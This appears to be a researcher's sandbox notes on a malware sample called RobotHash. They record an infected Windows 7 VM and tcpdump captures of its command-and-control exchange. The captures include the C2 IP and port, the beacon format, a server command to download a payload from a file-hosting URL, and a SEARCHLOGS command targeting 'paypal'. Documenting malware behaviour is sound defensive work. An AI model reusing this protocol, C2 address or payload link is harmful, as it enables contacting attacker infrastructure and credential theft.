SHA256: b52dfce5f89a429888f35bf530eb9efc6d24431f606f1a98795ee13f2c9b1c79
RobotHash
stared win7
infected
I started the calculator program by hand. To see if the C&C reflects this new process.
13:59:39.079194 IP 10.0.2.107.50424 > 77.81.104.169.14221: Flags [P.], seq 15:293, ack 1, win 64240, length 278 CONNECT=P4CK3T=FUCKBOY-9686316$^56^$11:50:22$^[taskmgr] Windows Task Manager^$WIN7$^Microsoft Windows 7 Ultimate 32-bit Desktop^$1.5$^04-05-2016^$N/A$^425d804aa328d98d348f6474b46b914630d5fdfe4b686b3d93ce1a54ef43c3a1^$FUCKBOY$^N^$8_=_8
13:59:39.847525 IP 77.81.104.169.14221 > 10.0.2.107.50424: Flags [P.], seq 1:157, ack 293, win 65535, length 156 C=P4CK3T=1TR4MPanq=()=4TR4MPSTOP=()=6TR4MPN=()=9TR4MP20408|13101|10472|48206|78356|78674|49580|64029|=()=10TR4MPhttp://files.catbox.moe/do3aqb.gifv=()=8_=8SEARCHLOGS=P4CK3T=paypal8=_8
We downloaded this file from outside the vm. do3aqb.gifv
I restarted after several weeks to see if the malware activates again. It came alive again! So we will wait...